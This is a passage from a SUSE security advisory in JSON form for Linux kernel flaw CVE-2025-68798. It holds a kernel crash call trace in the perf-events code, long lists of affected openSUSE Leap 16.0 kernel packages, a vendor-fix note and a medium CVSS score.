0000000000000000 RDI: 00000000000001a0\nRBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000002\nR13: ffff88811802a440 R14: ffff88811802a240 R15: ffff8881132d8601\nFS: 00007f097dfaa700(0000) GS:ffff888118000000(0000) GS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00000000200001c0 CR3: 0000000103d56000 CR4: 00000000000006f0\nCall Trace:\n \u003cIRQ\u003e\namd_pmu_enable_all (arch/x86/events/amd/core.c:760 (discriminator 2))\nx86_pmu_enable (arch/x86/events/core.c:1360)\nevent_sched_out (kernel/events/core.c:1191 kernel/events/core.c:1186\n kernel/events/core.c:2346)\n__perf_remove_from_context (kernel/events/core.c:2435)\nevent_function (kernel/events/core.c:259)\nremote_function (kernel/events/core.c:92 (discriminator 1)\n kernel/events/core.c:72 (discriminator 1))\n__flush_smp_call_function_queue (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207 ./include/trace/events/csd.h:64\n kernel/smp.c:135 kernel/smp.c:540)\n__sysvec_call_function_single (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207\n ./arch/x86/include/asm/trace/irq_vectors.h:99 arch/x86/kernel/smp.c:272)\nsysvec_call_function_single (arch/x86/kernel/smp.c:266 (discriminator 47)\n arch/x86/kernel/smp.c:266 (discriminator 47))\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68798",
"url": "https://www.suse.com/security/cve/CVE-2025-68798"
},
{
"category": "external",
"summary": "SUSE Bug 1256689 for CVE-2025-68798",
"url": "https://bugzilla.suse.com/1256689"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
